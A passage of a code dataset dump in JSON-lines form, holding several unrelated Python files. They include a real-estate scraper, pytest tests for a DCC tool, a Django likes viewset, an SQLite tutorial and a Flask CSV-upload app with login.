clientDataList.pop(user)\n vmConfigEngine.g_user_thread_lock[user].release() \n return\n","repo_name":"Cloudxtreme/paas-5","sub_path":"agent-modules/cloudbot/clcAPI/vmEngine00.py","file_name":"vmEngine00.py","file_ext":"py","file_size_in_byte":10433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37888576472","text":"def transform_matrix(A):\n \"\"\"\n Write an algorithm such that if an element in an MxN matrix is 0, its entire row and column is set 0.\n \"\"\"\n rows = len(A)\n cols = len(A[0])\n\n # an important pattern that I have not implemented here is the count-set;\n # have an array with index 1 if the value is postive or 0 if negative\n\n zero_rows = set()\n zero_cols = set()\n\n for i in range(rows):\n for j in range(cols):\n if A[i][j] == 0:\n zero_rows.add(i)\n zero_cols.add(j)\n \n for i in range(rows):\n if i in zero_rows:\n A[i] = [0] * cols\n else:\n for j in zero_cols:\n A[i][j] = 0\n","repo_name":"elliott-beach/problems","sub_path":"matrices/operate_on_cols.py","file_name":"operate_on_cols.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71684538459","text":"import asyncio\nfrom typing import List\n\nfrom app.common import SkipListing\nfrom app.scrapers.base import BaseScraper\n\n\nclass MaartenScraper(BaseScraper):\n\n MAKELAARDIJ: str = \"maarten\"\n BASE_URL: str = \"https://www.maartenmakelaardij.nl\"\n\n # Specific functions\n async def extract_object_urls(self, soup) -> List[str]:\n \"\"\"\n Extract apartment object urls\n \"\"\"\n items = soup.find_all(\"a\")\n urls: List[str] = []\n for item in items:\n if \"woning/rotterdam-\" in item[\"href\"]:\n urls.append(item[\"href\"])\n\n return list(set(urls))\n\n async def get_page_url(self, page_num: int) -> str:\n \"\"\"\n Format page url\n \"\"\"\n return f\"{self.BASE_URL}/aanbod/rotterdam/\"\n\n async def get_apartment_urls(self) -> List[str]:\n \"\"\"\n Fetch list of apartment urls from inventory\n \"\"\"\n urls = await self.scrape_page(0)\n return urls\n\n def extract_features(self, soup):\n \"\"\"\n Extract feature metadata from listing\n \"\"\"\n meta_data = {\n \"makelaardij\": self.MAKELAARDIJ,\n \"building\": {},\n \"unit\": {\"energy\": {}, \"tags\": []},\n }\n\n dt = soup.find_all(\"dt\")\n dd = soup.find_all(\"dd\")\n\n # Features\n for ind, key in enumerate(dt):\n\n if \"Bouwjaar\" in key.string:\n meta_data[\"building\"][\"year_constructed\"] = self.find_int(\n dd[ind].string\n )\n\n elif \"Woonoppervlakte\" in key.string:\n meta_data[\"unit\"][\"area\"] = self.find_float(dd[ind].text.split(\" \")[0])\n\n elif \"Aantal kamers\" in key.string:\n meta_data[\"unit\"][\"num_rooms\"] = self.find_int(dd[ind].text)\n\n elif \"verdiepingen\" in key.string:\n meta_data[\"unit\"][\"num_floors\"] = self.find_int(dd[ind].text)\n\n elif \"Status\" in key.string:\n meta_data[\"available\"] = \"Beschikbaar\" in dd[ind].text\n\n elif \"Buitenruimte\" in key.string and \"TUIN\" in dd[ind].text:\n meta_data[\"unit\"][\"tags\"].append(\"garden\")\n\n # Other fields\n meta_data[\"address\"] = soup.find(\"span\", {\"class\": \"adres\"}).string\n meta_data[\"asking_price\"] = self.find_int(\n soup.find(\"span\", {\"class\": \"price\"}).string.replace(\".\", \"\")\n )\n\n description = soup.find(\"div\", {\"id\": \"read-more-content\"}).children\n for p in description:\n p_text = str(p.text)\n if \"Eigen grond\" in p_text:\n meta_data[\"unit\"][\"own_land\"] = True\n elif \"erfpacht\" in p_text:\n meta_data[\"unit\"][\"own_land\"] = False\n\n if \"Energielabel\" in p_text:\n label = p_text.split(\"Energielabel: \")[1][0]\n meta_data[\"unit\"][\"energy\"][\"label\"] = label\n\n break\n\n # Bounce broken listings\n if not meta_data[\"unit\"].get(\"area\"):\n raise SkipListing(\"Unable to find area\")\n\n return meta_data\n\n\nif __name__ == \"__main__\":\n scraper = MaartenScraper()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(scraper.start())\n","repo_name":"damienallen/makelaardij-notify","sub_path":"server/app/scrapers/maarten.py","file_name":"maarten.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29755789236","text":"def FillBoard(n, point_x, point_y, x, y):\r\n global c\r\n if n == 2:\r\n for i in range(2):\r\n for j in range(2):\r\n if (x + i != point_x) or (y + j != point_y):\r\n Board[x + i][y + j] = int(c / 3)\r\n c += 1\r\n return\r\n else:\r\n for i in range(2):\r\n for j in range(2):\r\n if (x + i * n / 2 > point_x) or (point_x >= x + i * n / 2 + n / 2) or (y + j * n / 2 > point_y) or (point_y >= y + j * n / 2 + n / 2):\r\n Board[x + int(n / 2) - 1 + i][y + int(n / 2) - 1 + j] = c / 3\r\n c += 1\r\n\r\n for i in range(2):\r\n for j in range(2):\r\n if (x + i * n / 2 <= point_x) and (point_x < x + i * n / 2 + n / 2) and (y + j * n / 2 <= point_y) and (point_y < y + j * n / 2 + n / 2):\r\n FillBoard(int(n / 2), point_x, point_y, x + i * int(n / 2), y + j * int(n / 2))\r\n else:\r\n FillBoard(int(n / 2), x + int(n / 2) - 1 + i, y + int(n / 2) - 1 + j, x + i * int(n / 2), y + j * int(n / 2))\r\n\r\n\r\nn = int(input())\r\nn = 2 ** n\r\nc = 3\r\nBoard = [[0] * n for i in range(n)]\r\npoint_x, point_y = map(int, input().split())\r\nFillBoard(n, 0, 0, point_x - 1, point_y - 1)\r\nfor i in range(n):\r\n for j in range(n):\r\n print(int(Board[i][j]), end=' ')\r\n print()","repo_name":"1mm0rTaLzzz/OOP","sub_path":"1401.py","file_name":"1401.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72825181661","text":"from typing import List, Optional\n\nfrom django.conf import settings\nfrom typing_extensions import TypedDict\nfrom vk_api import VkApi\n\n\nclass ErrorResponse(TypedDict):\n code: int\n description: str\n\n\nclass ApiResponse(TypedDict):\n user_id: int\n status: bool\n error: Optional[ErrorResponse]\n\n\nclass NotificationsUtils:\n @staticmethod\n def send_notification(\n user_ids: List[int], message: str, fragment: str\n ) -> List[ApiResponse]:\n user_ids_str = \",\".join(str(user_id) for user_id in user_ids)\n api = VkApi(\n token=settings.VK_SERVICE_TOKEN,\n api_version=settings.VK_API_VERSION,\n ).get_api()\n return api.notifications.sendMessage(\n user_ids=user_ids_str, message=message, fragment=fragment\n )\n","repo_name":"dimadk24/english-fight","sub_path":"backend/game/notifications_utils.py","file_name":"notifications_utils.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70468015260","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for ExternalDCC class.\"\"\"\n\nimport shutil\nimport tempfile\nimport os\n\nimport pytest\nfrom stalker import (\n Version,\n Task,\n Project,\n Structure,\n StatusList,\n Repository,\n Status,\n FilenameTemplate,\n)\n\nfrom anima.dcc.external import ExternalDCC, ExternalDCCFactory\n\n\n@pytest.fixture(scope=\"function\")\ndef test_data(create_test_db):\n \"\"\"Set up the test data.\"\"\"\n data = dict()\n data[\"temp_path\"] = tempfile.mkdtemp()\n data[\"repo\"] = Repository(\n name=\"Test Repository\",\n code=\"TR\",\n linux_path=data[\"temp_path\"],\n windows_path=data[\"temp_path\"],\n osx_path=data[\"temp_path\"],\n )\n data[\"status_new\"] = Status.query.filter_by(code=\"NEW\").first()\n data[\"status_wip\"] = Status.query.filter_by(code=\"WIP\").first()\n data[\"status_cmpl\"] = Status.query.filter_by(code=\"CMPL\").first()\n\n data[\"project_status_list\"] = StatusList.query.filter_by(\n target_entity_type=\"Project\"\n ).first()\n data[\"task_filename_template\"] = FilenameTemplate(\n name=\"Task Filename Template\",\n target_entity_type=\"Task\",\n path=\"{{project.code}}/{%- for parent_task in parent_tasks -%}\"\n \"{{parent_task.nice_name}}/{%- endfor -%}\",\n filename=\"{{version.nice_name}}\"\n '_v{{\"%03d\"|format(version.version_number)}}{{extension}}',\n )\n data[\"project_structure\"] = Structure(\n name=\"Project Structure\", templates=[data[\"task_filename_template\"]]\n )\n data[\"project\"] = Project(\n name=\"Test Project\",\n code=\"TP\",\n status_list=data[\"project_status_list\"],\n repository=data[\"repo\"],\n structure=data[\"project_structure\"],\n )\n\n data[\"task\"] = Task(name=\"Test Task\", project=data[\"project\"])\n from stalker.db.session import DBSession\n\n DBSession.add(data[\"task\"])\n DBSession.commit()\n\n data[\"version\"] = Version(task=data[\"task\"])\n\n data[\"kwargs\"] = {\n \"name\": \"Photoshop\",\n \"extensions\": [\"psd\"],\n \"structure\": [\"Outputs\"],\n }\n\n data[\"external_env\"] = ExternalDCC(**data[\"kwargs\"])\n\n yield data\n\n # clean up the test\n shutil.rmtree(data[\"temp_path\"])\n\n\ndef test_name_argument_cannot_be_skipped(test_data):\n \"\"\"testing if a TypeError will raise when the name argument is skipped\"\"\"\n test_data[\"kwargs\"].pop(\"name\")\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_name_argument_cannot_be_None(test_data):\n \"\"\"testing if a TypeError will be raised when the name argument is None\"\"\"\n test_data[\"kwargs\"][\"name\"] = None\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_name_attribute_cannot_be_set_to_None(test_data):\n \"\"\"testing if a TypeError will be raised when the name attribute is set\n to None\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"name\", None)\n\n\ndef test_name_argument_should_be_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the name argument is not\n a string\n \"\"\"\n test_data[\"kwargs\"][\"name\"] = 32\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_name_attribute_should_be_set_to_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the name attribute is set\n to a value other than a string\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"name\", 23)\n\n\ndef test_name_argument_is_working_properly(test_data):\n \"\"\"testing if the name argument value is correctly passed to the name\n attribute\n \"\"\"\n test_value = \"ZBrush\"\n test_data[\"kwargs\"][\"name\"] = test_value\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert test_value == external_env.name\n\n\ndef test_name_attribute_is_working_properly(test_data):\n \"\"\"testing if the name attribute value is correctly set\"\"\"\n test_value = \"ZBrush\"\n test_data[\"external_env\"].name = test_value\n assert test_value == test_data[\"external_env\"].name\n\n\ndef test_extension_argument_cannot_be_skipped(test_data):\n \"\"\"testing if a TypeError will raised when the extension argument is\n skipped\n \"\"\"\n test_data[\"kwargs\"].pop(\"extensions\")\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_extension_argument_cannot_be_None(test_data):\n \"\"\"testing if a TypeError will be raised when the extension argument is\n None\n \"\"\"\n test_data[\"kwargs\"][\"extensions\"] = None\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_extension_attribute_cannot_be_set_to_None(test_data):\n \"\"\"testing if a TypeError will be raised when the extension attribute\n is set to None\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"extensions\", None)\n\n\ndef test_extension_argument_should_be_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the extension argument is\n not a string\n \"\"\"\n test_data[\"kwargs\"][\"extensions\"] = 32\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_extension_attribute_should_be_set_to_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the extension attribute\n is set to a value other than a string\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"extensions\", 23)\n\n\ndef test_extension_argument_with_no_dots_is_working(test_data):\n \"\"\"testing if extension argument accepts strings without a dot at the\n beginning\n \"\"\"\n test_data[\"kwargs\"][\"extensions\"] = [\"psd\"]\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert [\".psd\"] == external_env.extensions\n\n\ndef test_extension_attribute_with_no_dots_is_working(test_data):\n \"\"\"testing if extension attribute accepts strings without a dot at the\n beginning\n \"\"\"\n test_data[\"external_env\"].extensions = [\"psd\"]\n assert [\".psd\"] == test_data[\"external_env\"].extensions\n\n\ndef test_extension_argument_is_working_properly(test_data):\n \"\"\"testing if the extension argument value is correctly passed to the\n extension attribute\n \"\"\"\n test_value = [\".ztl\"]\n test_data[\"kwargs\"][\"extensions\"] = test_value\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert test_value == external_env.extensions\n\n\ndef test_extension_attribute_is_working_properly(test_data):\n \"\"\"testing if the extension attribute value is correctly set\"\"\"\n test_value = [\".ztl\"]\n test_data[\"external_env\"].extensions = test_value\n assert test_value == test_data[\"external_env\"].extensions\n\n\ndef test_structure_argument_can_be_skipped(test_data):\n \"\"\"testing if the structure argument can be skipped\"\"\"\n test_data[\"kwargs\"].pop(\"structure\")\n ExternalDCC(**test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_value_when_structure_argument_is_skipped(test_data):\n \"\"\"testing if the structure argument attribute will be an empty list\n when the structure argument is skipped\n \"\"\"\n test_data[\"kwargs\"].pop(\"structure\")\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert external_env.structure == []\n\n\ndef test_structure_argument_can_be_set_to_None(test_data):\n \"\"\"testing if the structure argument can be set to None\"\"\"\n test_data[\"kwargs\"][\"structure\"] = None\n ExternalDCC(**test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_value_when_structure_argument_is_None(test_data):\n \"\"\"testing if the structure argument attribute will be an empty list\n when the structure argument value is None\n \"\"\"\n test_data[\"kwargs\"][\"structure\"] = None\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert external_env.structure == []\n\n\ndef test_structure_attribute_can_be_set_to_None(test_data):\n \"\"\"testing if the structure attribute value will be an empty list when\n the structure attribute is set to None\n \"\"\"\n test_data[\"external_env\"].structure = None\n\n\ndef test_structure_argument_is_not_a_list(test_data):\n \"\"\"testing if a TypeError will be raised when the structure argument\n is not None or a list\n \"\"\"\n test_data[\"kwargs\"][\"structure\"] = \"this is not a list\"\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_is_not_a_list(test_data):\n \"\"\"testing if a TypeError will be raised when the structure attribute\n is not a set to None or a list\n \"\"\"\n pytest.raises(\n TypeError, ExternalDCC, test_data[\"external_env\"], \"structure\", \"this is not a list\"\n )\n\n\ndef test_structure_argument_is_not_a_list_of_strings(test_data):\n \"\"\"testing if a TypeError will be raised when not all the the elements\n are strings in structure argument\n \"\"\"\n test_data[\"kwargs\"][\"structure\"] = [\"not\", 1, \"list of\", \"strings\"]\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_is_not_a_list_of_strings(test_data):\n \"\"\"testing if a TypeError will be raised when not all the the elements\n are strings in structure attribute value\n \"\"\"\n test_value = [\"not\", 1, \"list of\", \"strings\"]\n pytest.raises(\n TypeError, setattr, test_data[\"external_env\"], \"structure\", test_value\n )\n\n\ndef test_structure_argument_is_working_properly(test_data):\n \"\"\"testing if the structure argument value is correctly passed to the\n structure attribute\n \"\"\"\n test_value = [\"Outputs\", \"Inputs\", \"cache\"]\n test_data[\"kwargs\"][\"structure\"] = test_value\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert sorted(test_value) == sorted(external_env.structure)\n\n\ndef test_structure_attribute_is_working_properly(test_data):\n \"\"\"testing if the structure attribute value can be correctly updated\"\"\"\n test_value = [\"Outputs\", \"Inputs\", \"cache\"]\n test_data[\"external_env\"].structure = test_value\n assert sorted(test_value) == sorted(test_data[\"external_env\"].structure)\n\n\ndef test_conform_version_argument_accepts_Version_instances_only(test_data):\n \"\"\"testing if a TypeError will be raised when the version argument in\n conform method is not a Version instance\n \"\"\"\n pytest.raises(\n TypeError, test_data[\"external_env\"].conform, version=\"not a version instance\"\n )\n\n\ndef test_conform_method_will_set_the_version_extension(test_data):\n \"\"\"testing if the conform method will set the version extension to the\n DCC extension correctly\n \"\"\"\n assert test_data[\"version\"].extension != \".ztl\"\n external_env = ExternalDCC(name=\"ZBrush\", extensions=[\".ztl\"])\n\n external_env.conform(test_data[\"version\"])\n assert test_data[\"version\"].extension == \".ztl\"\n\n\ndef test_conform_method_will_set_the_version_created_with(test_data):\n \"\"\"testing if the conform method will set the version extension to the DCC name\"\"\"\n assert test_data[\"version\"].extension != \".ztl\"\n external_env = ExternalDCC(name=\"ZBrush\", extensions=[\".ztl\"])\n external_env.conform(test_data[\"version\"])\n assert test_data[\"version\"].extension == \".ztl\"\n assert test_data[\"version\"].created_with == \"ZBrush\"\n\n\ndef test_initialize_structure_version_argument_accepts_Version_instances_only(\n test_data,\n):\n \"\"\"testing if a TypeError will be raised when the version argument in\n initialize_structure method is not a Version instance\n \"\"\"\n pytest.raises(\n TypeError,\n test_data[\"external_env\"].initialize_structure,\n version=\"not a version instance\",\n )\n\n\ndef test_initialize_structure_will_create_the_folders_of_the_environment(test_data):\n \"\"\"testing if the initialize_structure method will create the folders\n at the given Version instance path\n \"\"\"\n test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n for folder in test_data[\"external_env\"].structure:\n assert os.path.exists(os.path.join(test_data[\"version\"].absolute_path, folder))\n\n\ndef test_initialize_structure_will_handle_OSErrors(test_data):\n \"\"\"testing if the initialize_structure method will handle OSErrors when\n creating folders which are already there\n \"\"\"\n # call it multiple times\n test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n\n\ndef test_save_as_will_conform_and_initialize_structure(test_data):\n \"\"\"testing if the save_as method will conform the given version and\n initialize the structure\n \"\"\"\n test_data[\"external_env\"].save_as(test_data[\"version\"])\n assert test_data[\"external_env\"].extensions[0] == test_data[\"version\"].extension\n for folder in test_data[\"external_env\"].structure:\n assert os.path.exists(os.path.join(test_data[\"version\"].absolute_path, folder))\n\n\ndef test_get_settings_file_path_returns_the_settings_path_correctly(test_data):\n \"\"\"testing if the get_settings_path returns the settings path correctly\"\"\"\n assert (\n os.path.expanduser(\"~/.atrc/last_version\")\n == ExternalDCC.get_settings_file_path()\n )\n\n\ndef test_append_to_recent_files_version_argument_is_not_a_Version_instance(test_data):\n \"\"\"testing if a TypeError will be raised when the version argument in\n append_to_recent_files() method is not a stalker.models.version.Version\n instance\n \"\"\"\n pytest.raises(TypeError, test_data[\"external_env\"].append_to_recent_files, 3121)\n\n\ndef test_append_to_recent_files_working_properly(test_data):\n \"\"\"testing if the append_to_recent_files() method is working properly\"\"\"\n # set the id attribute of the test version to a random number\n test_data[\"version\"].id = 234\n test_data[\"external_env\"].append_to_recent_files(test_data[\"version\"])\n # check the settings file\n path = test_data[\"external_env\"].get_settings_file_path()\n with open(path, \"r\") as f:\n vid = f.read()\n assert vid == str(234)\n\n\ndef test_get_last_version_is_working_properly(test_data):\n \"\"\"testing if hte get_last_version() method will return Version\n instance properly\n \"\"\"\n from stalker.db.session import DBSession\n\n DBSession.add(test_data[\"version\"])\n DBSession.commit()\n assert test_data[\"version\"].id is not None\n test_data[\"external_env\"].append_to_recent_files(test_data[\"version\"])\n last_version = test_data[\"external_env\"].get_last_version()\n assert last_version == test_data[\"version\"]\n\n\ndef test_get_env_names_method_will_return_all_environment_names_properly(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env_names() method will\n return all the DCC names as a list of strings\n \"\"\"\n from anima.dcc.external import external_dccs\n\n expected_result = list(external_dccs.keys())\n ext_env_factory = ExternalDCCFactory()\n result = ext_env_factory.get_env_names()\n assert expected_result == result\n\n\ndef test_get_env_names_method_will_return_complex_environment_names_properly(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env_names() method will\n return all the DCC names as a list of strings in desired format\n when environment_name_format is set\n \"\"\"\n name_format = \"%e - %n\"\n expected_result = [\n \".ztl - ZBrush\",\n \".mud - MudBox\",\n #'.psd - Photoshop'\n ]\n ext_env_factory = ExternalDCCFactory()\n result = ext_env_factory.get_env_names(name_format=name_format)\n assert sorted(expected_result) == sorted(result)\n\n\ndef test_get_env_method_name_argument_is_not_a_string(create_test_db):\n \"\"\"testing if a TypeError will be raised when the name argument is not\n a string in ExternalEnvironmentFactory.get_env() method\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n pytest.raises(TypeError, ext_env_factory.get_env, 234)\n\n\ndef test_get_env_method_name_is_not_in_list(create_test_db):\n \"\"\"testing if a ValueError will be raised when the name argument value\n is not in the anima.dcc.external_environments list\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n pytest.raises(ValueError, ext_env_factory.get_env, \"Modo\")\n\n\ndef test_get_env_method_will_return_desired_environment(create_test_db):\n \"\"\"testing if ExternalDCCFactory.get_env() will return desired\n ExternalEnvironment instance\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n\n zbrush_tool = ext_env_factory.get_env(\"ZBrush\")\n assert isinstance(zbrush_tool, ExternalDCC)\n assert zbrush_tool.name == \"ZBrush\"\n assert zbrush_tool.extensions == [\".ztl\"]\n assert zbrush_tool.structure == [\"Outputs\"]\n\n mudbox = ext_env_factory.get_env(\"MudBox\")\n assert isinstance(mudbox, ExternalDCC)\n assert mudbox.name == \"MudBox\"\n assert mudbox.extensions == [\".mud\"]\n assert mudbox.structure == [\"Outputs\"]\n\n\ndef test_get_env_method_will_return_desired_environment_even_with_complex_formats(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env() will return desired\n ExternalEnvironment instance even with names like \"MudBox (.mud)\"\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n\n zbrush = ext_env_factory.get_env(\"ZBrush (.ztl)\", name_format=\"%n (%e)\")\n assert isinstance(zbrush, ExternalDCC)\n assert zbrush.name == \"ZBrush\"\n assert zbrush.extensions == [\".ztl\"]\n assert zbrush.structure == [\"Outputs\"]\n\n mudbox = ext_env_factory.get_env(\"MudBox (.mud)\", name_format=\"%n (%e)\")\n assert isinstance(mudbox, ExternalDCC)\n assert mudbox.name == \"MudBox\"\n assert mudbox.extensions == [\".mud\"]\n assert mudbox.structure == [\"Outputs\"]\n\n\ndef test_get_env_method_will_return_desired_environment_even_with_custom_formats(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env() will return desired\n ExternalEnvironment instance even with names like \"MudBox (.mud)\"\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n name_format = \"(%e) - %n\"\n zbrush = ext_env_factory.get_env(\"(.ztl) - ZBrush\", name_format=name_format)\n assert isinstance(zbrush, ExternalDCC)\n assert zbrush.name == \"ZBrush\"\n assert zbrush.extensions == [\".ztl\"]\n assert zbrush.structure == [\"Outputs\"]\n\n mudbox = ext_env_factory.get_env(\"(.mud) - MudBox\", name_format=name_format)\n assert isinstance(mudbox, ExternalDCC)\n assert mudbox.name == \"MudBox\"\n assert mudbox.extensions == [\".mud\"]\n assert mudbox.structure == [\"Outputs\"]\n","repo_name":"eoyilmaz/anima","sub_path":"tests/dcc/test_external.py","file_name":"test_external.py","file_ext":"py","file_size_in_byte":18175,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"69"}
+{"seq_id":"2084883687","text":"from posts.models import Post\nfrom likes.permissions import hasSelfVotedOrReadOnly\nfrom django.shortcuts import get_object_or_404, render\nfrom rest_framework import serializers, viewsets,status,permissions\nfrom . models import Like\nfrom . serializers import LikeSerializer\n\n\n# Create your views here.\nclass LikeViewSet(viewsets.ModelViewSet):\n queryset=Like.objects.all()\n serializer_class=LikeSerializer\n permission_classes=[permissions.IsAuthenticatedOrReadOnly,hasSelfVotedOrReadOnly]\n def perform_create(self, serializer):\n post_instance=get_object_or_404(Post,pk=self.request.data['post'])\n\n #if user likes the post\n if self.request.data['like']:\n already_liked=Like.objects.filter(post=post_instance,like=self.request.user).exists()\n if already_liked:\n raise serializers.ValidationError({\"message\":\"You have already liked this post\"})\n else:\n serializer.save(like=self.request.user,post=post_instance)\n #if dislikes\n else:\n already_disliked=Like.objects.filter(post=post_instance,unlike=self.request.user).exists()\n if already_disliked:\n raise serializers.ValidationError({\"message\":\"You have already disliked this post\"})\n else:\n serializer.save(unlike=self.request.user,post=post_instance)\n \n","repo_name":"eddyvk01/social-api","sub_path":"likes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"12351712544","text":"'''\nsqlite3\n - 내장형 DBMS : 기기 내부에서만 사용\n - 외부 접근 허용 안됨\n'''\n\nimport sqlite3\n\nprint(sqlite3.version_info) # (2, 6, 0) : 나오면 제대로 실행된다는 뜻.\nprint(sqlite3.sqlite_version_info) # (3, 31, 1)\n\ntry :\n # 1. database 생성 & db 연동 객체\n conn = sqlite3.connect(\"./chap09_Database/data/sqlite.db\") # sqlite.db 생성\n # sql문 실행 객체\n cursor = conn.cursor()\n\n # 2. table 생성\n sql = \"\"\"create table if not exists test_tab(\n name text(10),\n phone text(15),\n addr text(50) )\"\"\"\n cursor.execute(sql) # table 생성\n\n # 3. 테이블에 레코드 추가 # 쌍따옴표!!\n '''\n cursor.execute(\"insert into test_tab values('홍길동', '010-111-1111', '서울시')\")\n cursor.execute(\"insert into test_tab values('이순신', '010-111-1111', '해남시')\")\n cursor.execute(\"insert into test_tab values('유관순', '010-111-1111', '충남시')\")\n conn.commit() # db 반영, table 생성단계는 auto commit\n '''\n\n # 4. 레코드 조회 : commit의 대상이 아님. commit은 데이타베이스의 구조를 변화시킬 때에만.\n cursor.execute(\"select * from test_tab\")\n dataset = cursor.fetchall() # 객체에 저장된 레코드를 -> fetchall 사용하여 레코드 가져오기\n for row in dataset :\n print(row)\n\n print('='*35)\n print('이름\\t\\t전화번호\\t\\t주소')\n print('=' * 35)\n for row in dataset :\n print(row[0] + '\\t' + row[1] + '\\t' + row[2])\n print('=' * 35)\n\nexcept Exception as e:\n print('db 연동 오류 :', e)\n conn.rollback() # 이전 쿼리 실행을 취소\nfinally :\n cursor.close()\n conn.close()\n\n# ('홍길동', '010-111-1111', '서울시')\n# ('이순신', '010-111-1111', '해남시')\n# ('유관순', '010-111-1111', '충남시')\n# ===================================\n# 이름\t\t전화번호\t\t주소\n# ===================================\n# 홍길동\t010-111-1111\t서울시\n# 이순신\t010-111-1111\t해남시\n# 유관순\t010-111-1111\t충남시\n# ===================================\n\n","repo_name":"ssmmchoi/python1","sub_path":"workspace/chap09_Database/lecture01_sqlite/step01_sqlite_test.py","file_name":"step01_sqlite_test.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27925413653","text":"from flask import Flask, render_template, \\\n request, jsonify, send_file, session\nfrom db.dataBase import checkUser, execute_once\nimport os\nimport base64\nimport pandas as pd\n#from werkzeug import secure_filename\nfrom werkzeug.utils import secure_filename\nfrom main import main\n\napp = Flask(__name__)\napp.secret_key = \"my super secret key\"\n\n@app.route(\"/\")\ndef logIn():\n if 'user' in session:\n user = session['user']\n return render_template('home.html', user=user)\n\n return render_template('LogIn.html')\n\n@app.route('/checkUserLogIn', methods=['GET', 'POST'])\ndef checkUserLogIn():\n msg, status = '', False\n try:\n user = request.form['txtUsername']\n password = request.form['txtPass']\n status = checkUser(username=user, password=password)\n if status:\n session['user'] = user\n msg = 'successfully logged in'\n else:\n session.pop('user', None)\n msg = 'wrong username or password'\n except:\n session.pop('user', None)\n msg, status = 'Internal server error', False\n\n if status:\n return render_template('home.html', user=user)\n\n return jsonify({'status': status, 'msg': msg})\n\ndef remove_old_files(file=None):\n try:\n if file is not None:\n if os.path.exists(file):\n os.remove(file)\n print(file + ' removed')\n else:\n print(file + \" does not exist\")\n except:\n print('treat the error here')\n\n@app.route('/upload_document', methods=['POST', 'GET'])\ndef upload_document():\n if 'user' not in session:\n return\n status, msg, encoded_img, csv_table = False, \"\", \"\", \"\"\n if 'files' not in request.files:\n msg, status = 'No files', False\n return jsonify({'msg': msg, 'status': status})\n\n files = request.files.getlist('files')\n csv = files[0]\n\n filename = secure_filename(csv.filename) # make it safe\n if '.' not in filename or filename.rsplit('.', 1)[1].lower() != 'csv':\n msg, status = 'Not a csv file', False\n return jsonify({'msg': msg, 'status': status})\n\n save_folder = './save_folder'\n try:\n csv.save(os.path.join(save_folder, filename))\n\n main(os.path.join(save_folder, filename))\n\n img_name = './output.png'\n with open(img_name, \"rb\") as image_file:\n encoded_img = base64.b64encode(image_file.read())\n\n table = pd.read_csv(\"./output.csv\")\n csv_table = table.to_html()\n\n msg, status = 'ok', True\n except:\n msg, status = 'Server error -> main', False\n\n remove_old_files(file=os.path.join(save_folder, filename))\n remove_old_files(file='./output.png')\n\n result = {\"csv_table\": csv_table, \"encoded_img\": encoded_img, \"msg\": msg, \"status\": status}\n return jsonify(result)\n\n@app.route(\"/getCsv\")\ndef getCsv():\n if 'user' not in session:\n return\n try:\n csv = send_file('./output.csv',\n mimetype='text/csv',\n attachment_filename='output.csv',\n as_attachment=True)\n remove_old_files(file='./output.csv')\n return csv\n except:\n print('treat the error here')\n\n@app.route(\"/logOff\")\ndef logOff():\n session.pop('user', None)\n return render_template('LogIn.html')\n\n\nif __name__ == \"__main__\":\n 